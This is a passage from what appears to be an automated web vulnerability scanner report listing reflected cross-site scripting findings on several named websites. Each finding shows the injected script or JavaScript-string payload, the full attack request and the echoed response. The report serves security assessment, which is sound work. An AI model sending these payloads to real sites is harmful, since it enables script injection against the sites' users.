Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.2.10.1302308294

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:49 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pagec3392"><script>alert(1)</script>03fc8cb16ef/contact-us">
...[SNIP]...
1.134. http://www.internetrix.net/page/contact-us/jobs-at-internetrix/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/contact-us/jobs-at-internetrix/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29490"><script>alert(1)</script>5d04903db96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page29490"><script>alert(1)</script>5d04903db96/contact-us/jobs-at-internetrix/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:57 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page29490"><script>alert(1)</script>5d04903db96/contact-us/jobs-at-internetrix">
...[SNIP]...
1.135. http://www.internetrix.net/page/events/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/events/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44922"><script>alert(1)</script>5a4c4169ffa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page44922"><script>alert(1)</script>5a4c4169ffa/events/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:48 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page44922"><script>alert(1)</script>5a4c4169ffa/events">
...[SNIP]...
1.136. http://www.internetrix.net/page/products/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/products/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4474e"><script>alert(1)</script>dae382dfee4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page4474e"><script>alert(1)</script>dae382dfee4/products/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/articles/latest-news/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.9.10.1302308294

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:25:29 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page4474e"><script>alert(1)</script>dae382dfee4/products">
...[SNIP]...
1.137. http://www.mvtimes.com/marthas-vineyard/article.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/article.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e10a1"><script>alert(1)</script>06dfa831a6f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/article.php?id=4030e10a1"><script>alert(1)</script>06dfa831a6f HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/directory/?a=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=340f9a2f4e744e94e83d808165edd48d; __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.5.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:17:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 25573

A database error occurredA database error occurredA database error occurred<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="ht
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/article.php?id=4030e10a1"><script>alert(1)</script>06dfa831a6f">
...[SNIP]...
1.138. http://www.mvtimes.com/marthas-vineyard/article.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/article.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98c05"><script>alert(1)</script>730302c3221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/article.php?id=4030&98c05"><script>alert(1)</script>730302c3221=1 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/directory/?a=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=340f9a2f4e744e94e83d808165edd48d; __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.5.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:17:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 31188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/article.php?id=4030&98c05"><script>alert(1)</script>730302c3221=1">
...[SNIP]...
1.139. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 302e4"><script>alert(1)</script>2c94143d614 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/classifieds/110.php/%22onmouseover302e4"><script>alert(1)</script>2c94143d614=prompt(945581)%3E HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:15:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 29379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover302e4"><script>alert(1)</script>2c94143d614=prompt(945581)%3E">
...[SNIP]...
1.140. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e1ab"><script>alert(1)</script>bf94dc26cb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E?6e1ab"><script>alert(1)</script>bf94dc26cb6=1 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:15:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 29354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E?6e1ab"><script>alert(1)</script>bf94dc26cb6=1">
...[SNIP]...
1.141. http://www.wcax.com/Global/link.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/link.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae67'-alert(1)-'3ecbfdbef18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Global/link.asp?L=408799&1ae67'-alert(1)-'3ecbfdbef18=1 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352293178:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS10
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
ntCoent-Length: 26061
Cache-Control: private, max-age=300
Expires: Sat, 09 Apr 2011 12:39:03 GMT
Date: Sat, 09 Apr 2011 12:34:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 26061

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>WCAX Vermo
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','http://www.vermontopia.com/event/?L=408799&1ae67'-alert(1)-'3ecbfdbef18=1&referrerDomain=www.wcax.com');
</script>
...[SNIP]...
1.142. http://www.wcax.com/global/interface/httprequest/hrproxy.asp [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wcax.com
Path:   /global/interface/httprequest/hrproxy.asp

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c6a9e<a>86d1ec594e was submitted in the url parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /global/interface/httprequest/hrproxy.asp?url=http%3A%2F%2Fwp.myweather.net%2Fwxdata%2Ffiveday.asp%3Fpub%3Dwdnw%26s%3Dkbtvc6a9e<a>86d1ec594e&rand=98263 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352451310:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS54
P3P: CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/xml; charset=utf-8
ntCoent-Length: 93
Cache-Control: private, max-age=277
Date: Sat, 09 Apr 2011 12:34:19 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 93

<?xml version="1.0"?>
<!-- 200 - fiveday: KBTVC6A9E<A>86D1EC594E not found
--><datamissing/>
1.143. http://www.wcax.com/global/link.asp [function parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/link.asp

Issue detail

The value of the function request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38f44'-alert(1)-'4014e68a00c was submitted in the function parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/link.asp?L=104054&function=manageprofile38f44'-alert(1)-'4014e68a00c&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352689361:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS07
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 25813
Cache-Control: private, max-age=843
Date: Sat, 09 Apr 2011 12:38:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25813

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Registrati
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','/global/PM/registration.asp?L=104054&function=manageprofile38f44'-alert(1)-'4014e68a00c&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823&referrerDomain=www.wcax.com');
</script>
...[SNIP]...
1.144. http://www.wcax.com/global/link.asp [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/link.asp

Issue detail

The value of the mode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a495'-alert(1)-'4b87acb98b2 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/link.asp?L=104054&function=manageprofile&mode=create3a495'-alert(1)-'4b87acb98b2&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352689361:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis06
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 25813
Cache-Control: private, max-age=900
Date: Sat, 09 Apr 2011 12:38:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25813

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Registrati
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','/global/PM/registration.asp?L=104054&function=manageprofile&mode=create3a495'-alert(1)-'4b87acb98b2&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823&referrerDomain=www.wcax.com');
</script>
...[SNIP]...
1.145. http://www.wcax.com/global/link.asp [referrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/link.asp

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fdd3'-alert(1)-'cdf0dafd5c5 was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/link.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D3988238fdd3'-alert(1)-'cdf0dafd5c5 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352689361:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS10
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 25809
Cache-Control: private, max-age=886
Date: Sat, 09 Apr 2011 12:38:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25809

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Registrati
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','/global/PM/registration.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D3988238fdd3'-alert(1)-'cdf0dafd5c5&referrerDomain=www.wcax.com');
</script>
...[SNIP]...
1.146. http://y.cdn.adblade.com/imps.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://y.cdn.adblade.com
Path:   /imps.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7246"><script>alert(1)</script>f269b65bb7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,&e7246"><script>alert(1)</script>f269b65bb7d=1 HTTP/1.1
Host: y.cdn.adblade.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-type: text/html
Date: Mon, 11 Apr 2011 17:41:22 GMT
Expires: Mon, 11 Apr 2011 17:41:22 GMT
